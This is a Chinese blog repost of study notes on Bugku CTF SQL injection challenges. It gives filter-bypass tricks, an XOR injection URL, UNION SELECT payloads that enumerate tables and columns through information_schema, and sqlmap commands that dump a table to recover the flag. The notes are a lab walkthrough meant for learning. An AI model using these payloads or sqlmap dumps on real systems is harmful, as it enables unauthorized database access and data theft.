[web]sql

最新推荐文章于 2022-06-15 10:24:50 发布
最新推荐文章于 2022-06-15 10:24:50 发布
阅读量44 收藏
点赞数
原文链接:http://www.cnblogs.com/lx2331/p/9822585.html
版权

索引: 

 

[成绩单] [login1][多次]

其他150+的web题目

=============================

首先,我们通过[多次]这个题目来学习一下

url藏着id 那么id=1 根据提示也猜存在sql注入

SQL里没有双引号用法,数据类型为字符时用单引号

---------不知道为什么  先记住吧。。

id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入

【id=1‘ 是不行的  id=1=1--+是可以的(不知道为什么)】

然后试了一下  or这俩是错误 ,但oorr可以(存在过滤,可以进行双写)

那么我们用【异或注入来处理一下】

http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0)--+

忽然灵光一现。。。 所以说要多走走多活动活动啊,,,,

sql是恶意注入,分为:  

用了’,导致后面的语法变成了一串字符串(多神奇啊 ) 全都错了...

用了#之后,用了-- +之后.....

来源:

https://blog.csdn.net/johnlxj/article/details/82153355?utm_source=blogxgwz3

方法一:常规方法

进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4#

发现有四个表且都有回显

于是 就开始爆破吧

通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag

之后通过 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc

很显然我们需要的数据在fl4g这个表里

接下来我们就要暴字段了

通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

得到字段skctf_flag

最后我们就可以开始查询数据了

通过id=-1' union select 1,2,3,skctf_flag from fl4g#

得到BUGKU{Sql_INJECT0N_4813drd8hz4}
--------------------- 

原文:https://blog.csdn.net/johnlxj/article/details/82153355 

还有就是

然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id --current-db 
-r –> 加载一个文件 
-p –>指定参数 
–current-db –>获取当前数据库名称(current前有两个-) 


可以看到它的数据库为 ‘skctf_flag’,接着就是爆表 
sqlmap.py -r “C:\333.txt” -p id -D skctf_flag --tables 
-D –>指定数据库名称 
–tables –>列出数据库中的表(tables前有两个-) 


可以看到当前数据库中有两个表,很明显,flag应该在fl4g表中,下面就是该爆出表中的字段了 
sqlmap.py -r “C:\333.txt” -p id -D skctf_flag -T fl4g --columns 
-T –>指定表名称 
–columns –>列出表中的字段 


fl4g表中有一个名为skctf_flag字段,最后列出字段信息就可以啦。 
sqlmap.py -r “c:\333.txt” -p id -D skctf_flag -T fl4g -C skctf_flag --dump 
–dump –>列出字段数据(dump前有两个-) 

--------------------- 
作者:Tle_Camouflage 
来源:CSDN 
原文:https://blog.csdn.net/Tle_Camouflage/article/details/81978305 
版权声明:本文为博主原创文章,转载请附上博文链接!

==================

?id=1' union select 1,2,3,4 #

成绩单的题目直接使用这个注入,发现可以回显

然后下面的语句是用来搞出来系统里面备份的文件的....

以及....  ?id=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'#

 from information_schema.tables where table_schema='skctf_flag'#

 

转载于:https://www.cnblogs.com/lx2331/p/9822585.html

ansu1440
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web存储——Web SQL的使用(一)
bao的博客
03-10 2917
Web SQL
Web SQL介绍,web sql中增删改查、数据存储位置、运行脚本、建表建库
专研前端,探索后端
04-20 5195
Web SQLWeb SQL是一种简单的存在服务器中的数据库,运行在javascript脚本中,其数据储存在计算机Application中Web SQL中。 web sql提供了三个核心方法: 1.openDatabase(‘dbname’,‘edition’,‘explain’,‘size’),此方法用于查找数据库,如果没有则会创建一个新的数据库,其参数依次代表:数据库名称,版本号,描述文本,数据库大小。 2.transaction(),用于控制一个数据库,里面传入一个函数,函数的参数作为操作数据库的
浏览器(Browser) WebSql 学习笔记
kfepiza的博客
04-22 1679
WebSql 学习笔记 前言三个主要函数 : openDatabase , transaction , executeSqlopenDatabase(数据库名, 版本号, 数据库描述, 数据大小(字节), 回调函数可选)transactionexecuteSql(sql语句 , [替代问号的数组] , 成功回调 , 失败回调)执行成功后的回调的第二个参数 SQLResultSet 查询时必须用到完整示例1 前言 当前除火狐以外, 基本都支持WebSql WebSql不是Html5标准 三个主要函数 :
十分钟了解websql和indexedDB
缘友一世的博客
06-15 3841
websql和indexed DB简介 1.7 删除数据 动态删除[删除指定的数据id也可以是动态的] 1.8 更新数据 id设置为动态 1.9 控制台输出 onupgradeneeded只在创建的时候触发,是唯一能声明表结构的地方。 createObjectStore方法只能在这个回调中使用 2.5 添加数据 2.6 修改数据 2.7 删除数据【该种删除只能删除一条数据,必须传入主键】 2.8 查询数据 2.9小结...
webSQL与indexedDB
Guoye的专栏
06-07 1629
webSQL与indexedDB Web SQL Database 和 Indexed Database 简介 Web SQL Database 介绍 Web SQL Database API 实际上未包含在 HTML 5 规范之中,它是一个独立的规范,它引入了一套使用 SQL 操作客户端数据库的 API,这些 API 有同步的,也有异步的, 同步版本的 API 只在工作线程(Worker T...
如何在VUE项目中使用前端数据库WebSQL
a736755244的博客
08-13 8418
vue中使用前端数据库websql及一些常用配置、语法
WebSQL 插入数据有上限
csdn_huangjiama的博客
03-21 1709
前言 Web SQL 数据库可以在最新版的 Safari, Chrome 和 Opera 浏览器中工作,混合开发中用来存储大量数据也非常高效和方便(Web SQL操作指南 摸我)。 复盘 项目需求一次要导入大量数据到应用程序中,数据的插入过程也很简单,如果插入数据量少于500条跑起来是能够正常运行的,但超过500条时部分手机就会出错(部分手机一次插入超过500条虽...
前端存储之websql
热门推荐
netcy的专栏
08-12 2万+
最近公司系统需要做一个app,经过调查研究,决定用html5 + phonegap技术来开发,一方面对于html5技术已经很熟悉(虽然之前android也有所研究,但是还是在html5方面倾注精力更多),而且公司的项目pc端本身就是B/S的,移植到手机端比较容易,研发成本也比较低;另外基于html5技术的开发,可以做到跨平台,同时跑在android 和iOS两大系统没有问题。 app需要用到一些
关于webSQL的总结
jinqianwang的博客
10-11 6120
关于webSQL的使用总结 webSQL是浏览器自带的本地储存库之一,使用方法和Android的手机端sqLite是一样的, 用方法创库,用方法建表 //建库 let myBase = window.openDatabase("fristBase.db","1.0",null,20000); myBase是该数据库对象:参数 数据库名称 版本号 描述文本(null) 数据库大小 创建回调(省略)...
HTML5 Web SQL 数据库 讲解及使用
不想成为可以改变世界的程序员,不是一个好程序员
02-28 1454
为什么页面刷新后表就没了?openDatabase是什么?openDatabase是浏览器提供的吗? Web SQL 是在浏览器上模拟数据库,可以使用 JS 来操作 SQL 完成对数据的读写。 Web SQL 数据库 API 并不是 HTML5 规范的一部分,但是它是一个独立的规范,引入了一组使用 SQL 操作客户端数据库的 APIs。 Web SQL 数据库可以在最新版的 Safari, Chrome 和 Opera 浏览器中工作。
webSql/LocalStorage
04-19
使用webSql,LocalStorage作为数据存储,实现数据的增删改查
vue+element-ui+websql
04-19
使用vue+elemetnui框架,采用websql/localsotrage作为数据存储,实现增删改查
node-websql:为Node.js实现的WebSQL数据库API
04-30
节点WebSQL ,使用为Node实现。 在浏览器中,它退回到window.openDatabase 。 安装 npm install websql 用法 var openDatabase = require ( 'websql' ) ; 创建一个名为mydb.dbSQLite3数据库: var db = open...
web-DB-tools:web平台数据库SQL执行工具,权限、SQL收藏、SQL分享、以及一些小工具、webSQL
05-13
web-DB-tools体验地址 demo账号密码 feifei/123456简介一个web版数据库执行工具,而且写sql有提示,关键字和表名提示,没有字段提示.支持多条sql执行单条SQL执行table形式返回,多条SQL已JSON并格式化好返回展示.常用...
cordova-plugin-websql:适用于Windows Phone的Cordova WebSQL插件
05-09
适用于Apache Cordova的WebSQL插件(Windows Phone) 在SQLite库的顶部启用WebSQL功能。 此存储库基于MSOpenTech的。 但是,此插件支持sql的异步执行,其中MSOpenTech的WebSQL插件是完全同步的。 支持平台 该插件仅...
android手机应用源码Imsdroid语音视频通话源码.rar
最新发布
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
05-20
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
JavaScript_超过100种语言的纯Javascript OCR.zip
05-20
JavaScript
JavaScript_跨平台React UI包.zip
05-20
JavaScript
ctfshow web sql
08-23
因此,可以得出结论,ctfshow web sql竞赛是一个围绕web安全中的SQL注入漏洞进行的CTF竞赛。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* *3* ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值